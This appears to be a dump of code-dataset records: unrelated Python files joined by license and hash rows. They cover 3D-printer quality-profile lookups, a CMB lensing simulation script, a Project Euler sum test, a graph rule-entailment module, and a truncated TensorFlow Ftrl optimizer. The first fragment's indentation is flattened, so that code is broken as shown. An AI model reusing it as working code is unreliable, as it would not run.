return result[0] if result else None
## Find a quality changes container by name.
#
# \param quality_changes_name \type{str} the name of the quality changes container.
# \param machine_definition (Optional) \type{ContainerInstance} If nothing is
# specified then the currently selected machine definition is used.
# \param material_containers (Optional) \type{List[ContainerInstance]} If nothing is specified then
# the current set of selected materials is used.
# \return the matching quality changes containers \type{List[ContainerInstance]}
def findQualityChangesByName(self, quality_changes_name, machine_definition=None):
criteria = {"type": "quality_changes", "name": quality_changes_name}
result = self._getFilteredContainersForStack(machine_definition, [], **criteria)
return result
## Fetch the list of available quality types for this combination of machine definition and materials.
#
# \param machine_definition \type{DefinitionContainer}
# \param material_containers \type{List[InstanceContainer]}
# \return \type{List[str]}
def findAllQualityTypesForMachineAndMaterials(self, machine_definition, material_containers):
# Determine the common set of quality types which can be
# applied to all of the materials for this machine.
quality_type_dict = self.__fetchQualityTypeDictForMaterial(machine_definition, material_containers[0])
common_quality_types = set(quality_type_dict.keys())
for material_container in material_containers[1:]:
next_quality_type_dict = self.__fetchQualityTypeDictForMaterial(machine_definition, material_container)
common_quality_types.intersection_update(set(next_quality_type_dict.keys()))
return list(common_quality_types)
    ##  Fetches a dict of quality type names to quality profiles for a combination of machine and material.
#
# \param machine_definition \type{DefinitionContainer} the machine definition.
# \param material \type{ContainerInstance} the material.
# \return \type{Dict[str, ContainerInstance]} the dict of suitable quality type names mapping to qualities.
def __fetchQualityTypeDictForMaterial(self, machine_definition, material):
qualities = self.findAllQualitiesForMachineMaterial(machine_definition, material)
quality_type_dict = {}
for quality in qualities:
quality_type_dict[quality.getMetaDataEntry("quality_type")] = quality
return quality_type_dict
## Find a quality container by quality type.
#
# \param quality_type \type{str} the name of the quality type to search for.
# \param machine_definition (Optional) \type{ContainerInstance} If nothing is
# specified then the currently selected machine definition is used.
# \param material_containers (Optional) \type{List[ContainerInstance]} If nothing is specified then
# the current set of selected materials is used.
# \return the matching quality container \type{ContainerInstance}
def findQualityByQualityType(self, quality_type, machine_definition=None, material_containers=None, **kwargs):
criteria = kwargs
criteria["type"] = "quality"
if quality_type:
criteria["quality_type"] = quality_type
result = self._getFilteredContainersForStack(machine_definition, material_containers, **criteria)
# Fall back to using generic materials and qualities if nothing could be found.
if not result and material_containers and len(material_containers) == 1:
basic_materials = self._getBasicMaterials(material_containers[0])
result = self._getFilteredContainersForStack(machine_definition, basic_materials, **criteria)
return result[0] if result else None
## Find all suitable qualities for a combination of machine and material.
#
# \param machine_definition \type{DefinitionContainer} the machine definition.
# \param material_container \type{ContainerInstance} the material.
# \return \type{List[ContainerInstance]} the list of suitable qualities.
def findAllQualitiesForMachineMaterial(self, machine_definition, material_container):
criteria = {"type": "quality" }
result = self._getFilteredContainersForStack(machine_definition, [material_container], **criteria)
if not result:
basic_materials = self._getBasicMaterials(material_container)
result = self._getFilteredContainersForStack(machine_definition, basic_materials, **criteria)
return result
## Find all quality changes for a machine.
#
# \param machine_definition \type{DefinitionContainer} the machine definition.
# \return \type{List[InstanceContainer]} the list of quality changes
def findAllQualityChangesForMachine(self, machine_definition: DefinitionContainer) -> List[InstanceContainer]:
if machine_definition.getMetaDataEntry("has_machine_quality"):
definition_id = machine_definition.getId()
else:
definition_id = "fdmprinter"
filter_dict = { "type": "quality_changes", "extruder": None, "definition": definition_id }
quality_changes_list = ContainerRegistry.getInstance().findInstanceContainers(**filter_dict)
return quality_changes_list
## Find all usable qualities for a machine and extruders.
#
# Finds all of the qualities for this combination of machine and extruders.
# Only one quality per quality type is returned. i.e. if there are 2 qualities with quality_type=normal
    #   then only one of them is returned (at random).
#
# \param global_container_stack \type{ContainerStack} the global machine definition
# \param extruder_stacks \type{List[ContainerStack]} the list of extruder stacks
# \return \type{List[InstanceContainer]} the list of the matching qualities. The quality profiles
    #           returned come from the first extruder in the given list of extruders.
def findAllUsableQualitiesForMachineAndExtruders(self, global_container_stack, extruder_stacks):
global_machine_definition = global_container_stack.getBottom()
if extruder_stacks:
# Multi-extruder machine detected.
materials = [stack.findContainer(type="material") for stack in extruder_stacks]
else:
# Machine with one extruder.
materials = [global_container_stack.findContainer(type="material")]
quality_types = self.findAllQualityTypesForMachineAndMaterials(global_machine_definition, materials)
# Map the list of quality_types to InstanceContainers
qualities = self.findAllQualitiesForMachineMaterial(global_machine_definition, materials[0])
quality_type_dict = {}
for quality in qualities:
quality_type_dict[quality.getMetaDataEntry("quality_type")] = quality
return [quality_type_dict[quality_type] for quality_type in quality_types]
## Fetch more basic versions of a material.
#
# This tries to find a generic or basic version of the given material.
# \param material_container \type{InstanceContainer} the material
# \return \type{List[InstanceContainer]} a list of the basic materials or an empty list if one could not be found.
def _getBasicMaterials(self, material_container):
base_material = material_container.getMetaDataEntry("material")
material_container_definition = material_container.getDefinition()
if material_container_definition and material_container_definition.getMetaDataEntry("has_machine_quality"):
definition_id = material_container.getDefinition().getMetaDataEntry("quality_definition", material_container.getDefinition().getId())
else:
definition_id = "fdmprinter"
if base_material:
# There is a basic material specified
criteria = { "type": "material", "name": base_material, "definition": definition_id }
containers = ContainerRegistry.getInstance().findInstanceContainers(**criteria)
containers = [basic_material for basic_material in containers if
basic_material.getMetaDataEntry("variant") == material_container.getMetaDataEntry(
"variant")]
return containers
return []
def _getFilteredContainers(self, **kwargs):
return self._getFilteredContainersForStack(None, None, **kwargs)
def _getFilteredContainersForStack(self, machine_definition=None, material_containers=None, **kwargs):
# Fill in any default values.
if machine_definition is None:
machine_definition = Application.getInstance().getGlobalContainerStack().getBottom()
quality_definition_id = machine_definition.getMetaDataEntry("quality_definition")
if quality_definition_id is not None:
machine_definition = ContainerRegistry.getInstance().findDefinitionContainers(id=quality_definition_id)[0]
if material_containers is None:
active_stacks = ExtruderManager.getInstance().getActiveGlobalAndExtruderStacks()
material_containers = [stack.findContainer(type="material") for stack in active_stacks]
criteria = kwargs
filter_by_material = False
machine_definition = self.getParentMachineDefinition(machine_definition)
whole_machine_definition = self.getWholeMachineDefinition(machine_definition)
if whole_machine_definition.getMetaDataEntry("has_machine_quality"):
definition_id = machine_definition.getMetaDataEntry("quality_definition", whole_machine_definition.getId())
criteria["definition"] = definition_id
filter_by_material = whole_machine_definition.getMetaDataEntry("has_materials")
else:
criteria["definition"] = "fdmprinter"
# Stick the material IDs in a set
if material_containers is None or len(material_containers) == 0:
filter_by_material = False
else:
material_ids = set()
for material_instance in material_containers:
if material_instance is not None:
# Add the parent material too.
for basic_material in self._getBasicMaterials(material_instance):
material_ids.add(basic_material.getId())
material_ids.add(material_instance.getId())
containers = ContainerRegistry.getInstance().findInstanceContainers(**criteria)
result = []
for container in containers:
# If the machine specifies we should filter by material, exclude containers that do not match any active material.
if filter_by_material and container.getMetaDataEntry("material") not in material_ids and not "global_quality" in kwargs:
continue
result.append(container)
return result
## Get the parent machine definition of a machine definition.
#
# \param machine_definition \type{DefinitionContainer} This may be a normal machine definition or
# an extruder definition.
# \return \type{DefinitionContainer} the parent machine definition. If the given machine
# definition doesn't have a parent then it is simply returned.
def getParentMachineDefinition(self, machine_definition: DefinitionContainer) -> DefinitionContainer:
container_registry = ContainerRegistry.getInstance()
machine_entry = machine_definition.getMetaDataEntry("machine")
if machine_entry is None:
            # We have a normal (whole) machine definition
quality_definition = machine_definition.getMetaDataEntry("quality_definition")
if quality_definition is not None:
parent_machine_definition = container_registry.findDefinitionContainers(id=quality_definition)[0]
return self.getParentMachineDefinition(parent_machine_definition)
else:
return machine_definition
else:
# This looks like an extruder. Find the rest of the machine.
whole_machine = container_registry.findDefinitionContainers(id=machine_entry)[0]
parent_machine = self.getParentMachineDefinition(whole_machine)
if whole_machine is parent_machine:
# This extruder already belongs to a 'parent' machine def.
return machine_definition
else:
# Look up the corresponding extruder definition in the parent machine definition.
extruder_position = machine_definition.getMetaDataEntry("position")
parent_extruder_id = parent_machine.getMetaDataEntry("machine_extruder_trains")[extruder_position]
return container_registry.findDefinitionContainers(id=parent_extruder_id)[0]
## Get the whole/global machine definition from an extruder definition.
#
# \param machine_definition \type{DefinitionContainer} This may be a normal machine definition or
# an extruder definition.
# \return \type{DefinitionContainer}
def getWholeMachineDefinition(self, machine_definition):
machine_entry = machine_definition.getMetaDataEntry("machine")
if machine_entry is None:
# This already is a 'global' machine definition.
return machine_definition
else:
container_registry = ContainerRegistry.getInstance()
whole_machine = container_registry.findDefinitionContainers(id=machine_entry)[0]
return whole_machine
| agpl-3.0 | -6,735,441,099,129,865,000 | 55.076923 | 145 | 0.678878 | false |
msyriac/orphics | bin/rot_recon.py | 1 | 4352 | from orphics.mpi import MPI
import orphics.pipelines as utils
import argparse
from enlib import enmap
# Parse command line
parser = argparse.ArgumentParser(description='Run south rotation test.')
parser.add_argument("-x", "--patch-width", type=float, default=40., help="Patch width in degrees.")
parser.add_argument("-y", "--patch-height", type=float, default=15., help="Patch height in degrees.")
parser.add_argument("-o", "--yoffset", type=float, default=60., help="Offset in declination of southern patch center.")
parser.add_argument("-p", "--full-sky-pixel", type=float, default=0.5,help="Full sky pixel resolution in arcminutes.")
parser.add_argument("-i", "--pix-inter", type=float, default=None,help="Intermediate patch pixelization.")
parser.add_argument("-l", "--lmax", type=int, default=7000,help="Lmax for full-sky lensing.")
parser.add_argument("-b", "--bin-lmax", type=int, default=3000,help="Lmax for binning.")
parser.add_argument("-N", "--Nsims", type=int, default=10,help="Number of sims.")
parser.add_argument("-m", "--meanfield", type=str, default=None,help="Meanfield file root.")
parser.add_argument('-s', "--skip-recon",action='store_true',help="Skip reconstruction.")
args = parser.parse_args()
# Intialize the rotation testing pipeline
pipe = utils.RotTestPipeline(full_sky_pix=args.full_sky_pixel,wdeg=args.patch_width,
hdeg=args.patch_height,yoffset=args.yoffset,
mpi_comm=MPI.COMM_WORLD,nsims=args.Nsims,lmax=args.lmax,pix_intermediate=args.pix_inter,
bin_lmax=args.bin_lmax)
cmb = {} # this will store CMB maps
ikappa = {} # this will store input kappa maps
mlist = ['e','s','r'] # e stands for patch native to equator, s for native to south, r for rotated from south to equator
mf = {}
# Check if a meanfield is provided
for m in mlist:
if args.meanfield is not None:
mf[m] = enmap.read_map(args.meanfield+"/meanfield_"+m+".hdf")
else:
mf[m] = 0.
for k,index in enumerate(pipe.tasks):
# Make CMB maps and kappa maps
cmb['s'],cmb['e'],ikappa['s'],ikappa['e'] = pipe.make_sim(index)
# Rotate CMB map and kappa
cmb['r'] = pipe.rotator.rotate(cmb['s'])
ikappa['r'] = pipe.rotator.rotate(ikappa['s'], order=5, mode="constant", cval=0.0, prefilter=True, mask_nan=True, safe=True)
# For each of e,s,r
for m in mlist:
# Calculate CMB power
cxc,kcmb,kcmb = pipe.fc[m].power2d(cmb[m])
pipe.mpibox.add_to_stats("cmb-"+m,pipe.binner[m].bin(cxc/pipe.w2[m])[1]) # Divide by w2 window correction
# Calculate input kappa power
ixi,kinput,_ = pipe.fc[m].power2d(ikappa[m])
ixi /= pipe.w2[m] # divide by w2 window correction
pipe.mpibox.add_to_stats("ixi-"+m,pipe.binner[m].bin(ixi)[1])
if args.skip_recon: continue
if pipe.rank==0: pipe.logger.info( "Reconstructing...")
# Reconstruct and subtract meanfield if any
recon = pipe.reconstruct(m,cmb[m]) - mf[m]
if pipe.rank==0: pipe.logger.info( "Powers...")
# Calculate raw Clkk power
rxr,krecon,_ = pipe.fc[m].power2d(recon)
rxr /= pipe.w4[m]
# Calculate recon cross input power
rxi = pipe.fc[m].f2power(kinput,krecon)
rxi /= pipe.w3[m]
# Calculate realization dependent N0 ("super dumb")
n0 = pipe.qest[m].N.super_dumb_N0_TTTT(cxc)/pipe.w2[m]**2.
# Calculate corrected Clkk power
rxr_n0 = rxr - n0
# Collect statistics
pipe.mpibox.add_to_stack("meanfield-"+m,recon)
pipe.mpibox.add_to_stats("rxr-"+m,pipe.binner[m].bin(rxr)[1])
pipe.mpibox.add_to_stats("rxi-"+m,pipe.binner[m].bin(rxi)[1])
pipe.mpibox.add_to_stats("n0-"+m,pipe.binner[m].bin(n0)[1])
pipe.mpibox.add_to_stats("rxr-n0-"+m,pipe.binner[m].bin(rxr_n0)[1])
if k==0 and pipe.rank==0:
import orphics.io as io
io.plot_img(cmb[m],io.dout_dir+"cmb_"+m+".png",high_res=True)
io.plot_img(recon,io.dout_dir+"recon_"+m+".png",high_res=True)
if pipe.rank==0: pipe.logger.info( "MPI Collecting...")
pipe.mpibox.get_stacks(verbose=False)
pipe.mpibox.get_stats(verbose=False)
if pipe.rank==0:
pipe.dump(save_meanfield=(args.meanfield is None),skip_recon=args.skip_recon)
| bsd-2-clause | 4,958,113,471,433,312,000 | 41.252427 | 128 | 0.637638 | false |
doozr/euler.py | p0013_large_sum_test.py | 1 | 11957 | """
Work out the first ten digits of the sum of the following one-hundred 50-digit numbers.
37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690
Answer:
5537376230
"""
def large_sum(nums, n):
return str(sum(nums))[0:n]
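# Quick sanity check with small, made-up inputs: 123 + 456 = 579, so
# large_sum([123, 456], 2) == "57".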
def test_0013_large_sum():
digits = [37107287533902102798797998220837590246510135740250,
46376937677490009712648124896970078050417018260538,
74324986199524741059474233309513058123726617309629,
91942213363574161572522430563301811072406154908250,
23067588207539346171171980310421047513778063246676,
89261670696623633820136378418383684178734361726757,
28112879812849979408065481931592621691275889832738,
44274228917432520321923589422876796487670272189318,
47451445736001306439091167216856844588711603153276,
70386486105843025439939619828917593665686757934951,
62176457141856560629502157223196586755079324193331,
64906352462741904929101432445813822663347944758178,
92575867718337217661963751590579239728245598838407,
58203565325359399008402633568948830189458628227828,
80181199384826282014278194139940567587151170094390,
35398664372827112653829987240784473053190104293586,
86515506006295864861532075273371959191420517255829,
71693888707715466499115593487603532921714970056938,
54370070576826684624621495650076471787294438377604,
53282654108756828443191190634694037855217779295145,
36123272525000296071075082563815656710885258350721,
45876576172410976447339110607218265236877223636045,
17423706905851860660448207621209813287860733969412,
81142660418086830619328460811191061556940512689692,
51934325451728388641918047049293215058642563049483,
62467221648435076201727918039944693004732956340691,
15732444386908125794514089057706229429197107928209,
55037687525678773091862540744969844508330393682126,
18336384825330154686196124348767681297534375946515,
80386287592878490201521685554828717201219257766954,
78182833757993103614740356856449095527097864797581,
16726320100436897842553539920931837441497806860984,
48403098129077791799088218795327364475675590848030,
87086987551392711854517078544161852424320693150332,
59959406895756536782107074926966537676326235447210,
69793950679652694742597709739166693763042633987085,
41052684708299085211399427365734116182760315001271,
65378607361501080857009149939512557028198746004375,
35829035317434717326932123578154982629742552737307,
94953759765105305946966067683156574377167401875275,
88902802571733229619176668713819931811048770190271,
25267680276078003013678680992525463401061632866526,
36270218540497705585629946580636237993140746255962,
24074486908231174977792365466257246923322810917141,
91430288197103288597806669760892938638285025333403,
34413065578016127815921815005561868836468420090470,
23053081172816430487623791969842487255036638784583,
11487696932154902810424020138335124462181441773470,
63783299490636259666498587618221225225512486764533,
67720186971698544312419572409913959008952310058822,
95548255300263520781532296796249481641953868218774,
76085327132285723110424803456124867697064507995236,
37774242535411291684276865538926205024910326572967,
23701913275725675285653248258265463092207058596522,
29798860272258331913126375147341994889534765745501,
18495701454879288984856827726077713721403798879715,
38298203783031473527721580348144513491373226651381,
34829543829199918180278916522431027392251122869539,
40957953066405232632538044100059654939159879593635,
29746152185502371307642255121183693803580388584903,
41698116222072977186158236678424689157993532961922,
62467957194401269043877107275048102390895523597457,
23189706772547915061505504953922979530901129967519,
86188088225875314529584099251203829009407770775672,
11306739708304724483816533873502340845647058077308,
82959174767140363198008187129011875491310547126581,
97623331044818386269515456334926366572897563400500,
42846280183517070527831839425882145521227251250327,
55121603546981200581762165212827652751691296897789,
32238195734329339946437501907836945765883352399886,
75506164965184775180738168837861091527357929701337,
62177842752192623401942399639168044983993173312731,
32924185707147349566916674687634660915035914677504,
99518671430235219628894890102423325116913619626622,
73267460800591547471830798392868535206946944540724,
76841822524674417161514036427982273348055556214818,
97142617910342598647204516893989422179826088076852,
87783646182799346313767754307809363333018982642090,
10848802521674670883215120185883543223812876952786,
71329612474782464538636993009049310363619763878039,
62184073572399794223406235393808339651327408011116,
66627891981488087797941876876144230030984490851411,
60661826293682836764744779239180335110989069790714,
85786944089552990653640447425576083659976645795096,
66024396409905389607120198219976047599490197230297,
64913982680032973156037120041377903785566085089252,
16730939319872750275468906903707539413042652315011,
94809377245048795150954100921645863754710598436791,
78639167021187492431995700641917969777599028300699,
15368713711936614952811305876380278410754449733078,
40789923115535562561142322423255033685442488917353,
44889911501440648020369068063960672322193204149535,
41503128880339536053299340368006977710650566631954,
81234880673210146739058568557934581403627822703280,
82616570773948327592232845941706525094512325230608,
22918802058777319719839450180888072429661980811197,
77158542502016545090413245809786882778948721859617,
72107838435069186155435662884062257473692284509516,
20849603980134001723930671666823555245252804609722,
53503534226472524250874054075591789781264330331690]
assert large_sum(digits, 10) == "5537376230"
| gpl-3.0 | 8,063,223,558,314,383,000 | 54.356481 | 87 | 0.851133 | false |
gjhiggins/graphpath | graphpath/entail.py | 1 | 8355 | from __future__ import generators
from expr import Step, Class, Property
from util.anysets import Set, ImmutableSet
empty_set = ImmutableSet()
class RuleDict(dict):
"""A mapping of resources to GraphPath expressions.
The expression for a given resource is the Union()
of all the expressions assigned to that mapping.
"""
def __setitem__(self, res, expr):
"""Add a definition for a resource"""
if res in self:
extant = self[res]
if extant != expr:
dict.__setitem__(self, res, extant | expr)
else:
dict.__setitem__(self, res, expr)
class ClassRules(RuleDict, Step):
"""A dictionary of class definitions and, simultaneously,
the rule for rdf:type.
As a mapping, the key is a class resource and the value
is a GraphPath expression.
As a GraphPath step, match every implied rdf:type path.
"""
def values(self, pop, members):
"""It is very expensive to ask the rdf.type of a resource
under this rule evaluation system. For now, we defer to
the ground facts when asked a type."""
return empty_set
# full implementation disabled....
result = Set()
for clss in self:
if members & self[clss].initials(pop):
result.add(clss)
return result
def match(self, pop, classes):
"""Generate the extent set for a class or classes."""
result = Set()
for clss in classes:
if clss in self:
result |= self[clss].initials(pop)
return result
def __or__(self, other):
"""Prevent accidental modification
        via redefinition of rdf:type."""
raise NotImplementedError
class PropertyRules(RuleDict):
"""A dictionary of property definitions.
The key is a property resource and the value is a
    GraphPath expression.
"""
class RuleBase:
"""A RuleBase is a mapping of classes and properties to their
definitions.
A class is indexed by an elementary Class(...)
step and its mapping is a definition in the form of
an absolute GraphPath expression.
A property is indexed by an elementary Property(...) step
and its mapping is a definition in the form of a relative
GraphPath expression.
Two attributes, self.classes and self.properties expose
the two rule populations individually.
"""
def __init__(self):
self.clear()
def clear(self):
"""Empty the rule base."""
self.classes = ClassRules()
self.properties = PropertyRules()
def __getstate__(self):
return self.properties, self.classes
def __setstate__(self, state):
self.properties, self.classes = state
def update(self, other):
"""Add all rules from another rulebase."""
for key in other:
self[key] = other[key]
def __setitem__(self, lvalue, expr):
"""Add a definition for a class or property.
Multiple definitions for the same class or property
are combined by union.
"""
if isinstance(lvalue, Class):
self.classes[lvalue.resource()] = expr
else:
assert isinstance(lvalue, Property)
self.properties[lvalue.resource()] = expr
def __getitem__(self, lvalue):
"""Map a class or property to its definition."""
if isinstance(lvalue, Class):
return self.classes[lvalue.resource()]
else:
assert isinstance(lvalue, Property)
return self.properties[lvalue.resource()]
def __contains__(self, lvalue):
"""Test if a class or property is defined."""
try:
__trial = self[lvalue]
del __trial
except KeyError:
return False
else:
return True
def __iter__(self):
"""Iterate all properties and classes in the rule base."""
for res in self.classes:
yield Class(res)
for res in self.properties:
if self.properties[res] is not self.classes:
yield Property(res)
def get(self, lvalue, default=None):
"""Map a class or property to its definition or None."""
try:
return self[lvalue]
except KeyError:
return default
class Sandbox:
"""A Sandbox is an environment for rule execution. It implements the
Population protocol and so can be queried with
expricit GraphPath expressions and implicitly by rules.
Rule dependencies a tracked, circular rules are iterated until stable,
and results are cached for the lifetime of the sandbox.
A sandbox requires the ground facts and rules to remain contant and there
must be only one thread executing in the sandbox.
Rules should be written so results depend only on information provided
by calling the sandbox methods. Rules must support the rule protocol
(see expr module) but need not be written using the expr module classes.
"""
def __init__(self, pop, rules):
"""Create a sandbox for the given facts and rules (both constant)."""
self._pop = pop
self._rules = rules
self._cache = {}
self._stack = []
self._circular = {}
# set the rdf:type rule for the local rdf:type symbol
self.rdf_type = pop.rdf_type
rules.properties[pop.rdf_type] = rules.classes
def match(self, prop, value):
"""Delegate the match function to a rule, if any,
otherwise return ground facts."""
if prop in self._rules.properties:
return self._evaluate(False, prop, value)
else:
return self._pop.match(prop, value)
def values(self, subj, prop):
"""Delegate the values function to a rule, if any,
otherwise return ground facts."""
if prop in self._rules.properties:
return self._evaluate(True, prop, subj)
else:
return self._pop.values(subj, prop)
def _evaluate(self, forward, prop, seed):
"""evaluate a rule for a property, prop,
in the direction, forward, with the argument, seed."""
pattern = forward, prop, seed # the present query as a tuple
stack = self._stack
circs = self._circular
cache = self._cache
# print " "*len(stack),pattern
# have we seen this query before?
if pattern in cache:
# is it a circular query (depends on its own result)?
if pattern in stack:
# register the query with its circular dependencies
depends = circs.setdefault(pattern, Set())
for ix in range(len(stack) - 1, -1, -1): # 2.2 syntax
depend = stack[ix]
if depend == pattern:
break
depends.add(depend)
# return previously obtained result
return cache[pattern]
# prepare to evaluate from scratch
seeds = Set([seed])
result = cache[pattern] = Set()
# get rule and ground facts
if forward:
rule = self._rules.properties[prop].values
result |= self._pop.values(seed, prop)
else:
rule = self._rules.properties[prop].match
result |= self._pop.match(prop, seed)
# maintain an evaluation stack to track circular dependencies
stack.append(pattern)
# attempt evaluation
result |= rule(self, seeds)
# if a circulation was detected we must iterate
if pattern in circs:
depends = circs[pattern]
while True:
init_count = len(result)
# invalidate cache for sub-queries that depend on result
for depend in depends:
del cache[depend]
result |= rule(self, seeds)
# if no new results were obtained we are finished
if len(result) == init_count:
break
# evaluation complete: cleanup stack
stack.pop()
return result
def __contains__(self, rid):
return rid in self._pop
def __iter__(self):
return iter(self._pop)
def __getitem__(self, rid):
return self._pop[rid]
| gpl-2.0 | -8,830,023,813,209,567,000 | 31.134615 | 77 | 0.59234 | false |
Intel-Corporation/tensorflow | tensorflow/python/keras/optimizer_v2/ftrl.py | 1 | 9853 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ftrl-proximal for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.keras.optimizer_v2 import optimizer_v2
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.training import training_ops
from tensorflow.python.util.tf_export import keras_export
@keras_export('keras.optimizers.Ftrl')
class Ftrl(optimizer_v2.OptimizerV2):
r"""Optimizer that implements the FTRL algorithm.
See Algorithm 1 of this [paper](
https://www.eecs.tufts.edu/~dsculley/papers/ad-click-prediction.pdf).
This version has support for both online L2 (the L2 penalty given in the paper
above) and shrinkage-type L2 (which is the addition of an L2 penalty to the
loss function).
Initialization:
$$t = 0$$
$$n_{0} = 0$$
$$\sigma_{0} = 0$$
$$z_{0} = 0$$
Update ($$i$$ is variable index):
$$t = t + 1$$
$$n_{t,i} = n_{t-1,i} + g_{t,i}^{2}$$
$$\sigma_{t,i} = (\sqrt{n_{t,i}} - \sqrt{n_{t-1,i}}) / \alpha$$
$$z_{t,i} = z_{t-1,i} + g_{t,i} - \sigma_{t,i} * w_{t,i}$$
  $$w_{t,i} = - ((\beta+\sqrt{n_{t,i}}) / \alpha + \lambda_{2})^{-1} * (z_{t,i} -
  sgn(z_{t,i}) * \lambda_{1}) if \abs{z_{t,i}} > \lambda_{1} else 0$$
Check the documentation for the l2_shrinkage_regularization_strength
parameter for more details when shrinkage is enabled, where gradient is
replaced with gradient_with_shrinkage.
"""
def __init__(self,
learning_rate,
learning_rate_power=-0.5,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0,
name='Ftrl',
l2_shrinkage_regularization_strength=0.0,
**kwargs):
r"""Construct a new FTRL optimizer.
Args:
learning_rate: A float value or a constant float `Tensor`.
learning_rate_power: A float value, must be less or equal to zero.
Controls how the learning rate decreases during training. Use zero for
a fixed learning rate.
initial_accumulator_value: The starting value for accumulators.
Only zero or positive values are allowed.
l1_regularization_strength: A float value, must be greater than or
equal to zero.
l2_regularization_strength: A float value, must be greater than or
equal to zero.
name: Optional name prefix for the operations created when applying
gradients. Defaults to "Ftrl".
l2_shrinkage_regularization_strength: A float value, must be greater than
or equal to zero. This differs from L2 above in that the L2 above is a
stabilization penalty, whereas this L2 shrinkage is a magnitude penalty.
The FTRL formulation can be written as:
w_{t+1} = argmin_w(\hat{g}_{1:t}w + L1*||w||_1 + L2*||w||_2^2), where
\hat{g} = g + (2*L2_shrinkage*w), and g is the gradient of the loss
function w.r.t. the weights w.
Specifically, in the absence of L1 regularization, it is equivalent to
the following update rule:
w_{t+1} = w_t - lr_t / (1 + 2*L2*lr_t) * g_t -
2*L2_shrinkage*lr_t / (1 + 2*L2*lr_t) * w_t
where lr_t is the learning rate at t.
        When input is sparse, shrinkage will only happen on the active weights.
**kwargs: keyword arguments. Allowed to be {`clipnorm`, `clipvalue`, `lr`,
`decay`}. `clipnorm` is clip gradients by norm; `clipvalue` is clip
gradients by value, `decay` is included for backward compatibility to
allow time inverse decay of learning rate. `lr` is included for backward
compatibility, recommended to use `learning_rate` instead.
Raises:
ValueError: If one of the arguments is invalid.
References
See [paper]
(https://www.eecs.tufts.edu/~dsculley/papers/ad-click-prediction.pdf)
"""
super(Ftrl, self).__init__(name, **kwargs)
if initial_accumulator_value < 0.0:
raise ValueError(
'initial_accumulator_value %f needs to be positive or zero' %
initial_accumulator_value)
if learning_rate_power > 0.0:
raise ValueError('learning_rate_power %f needs to be negative or zero' %
learning_rate_power)
if l1_regularization_strength < 0.0:
raise ValueError(
'l1_regularization_strength %f needs to be positive or zero' %
l1_regularization_strength)
if l2_regularization_strength < 0.0:
raise ValueError(
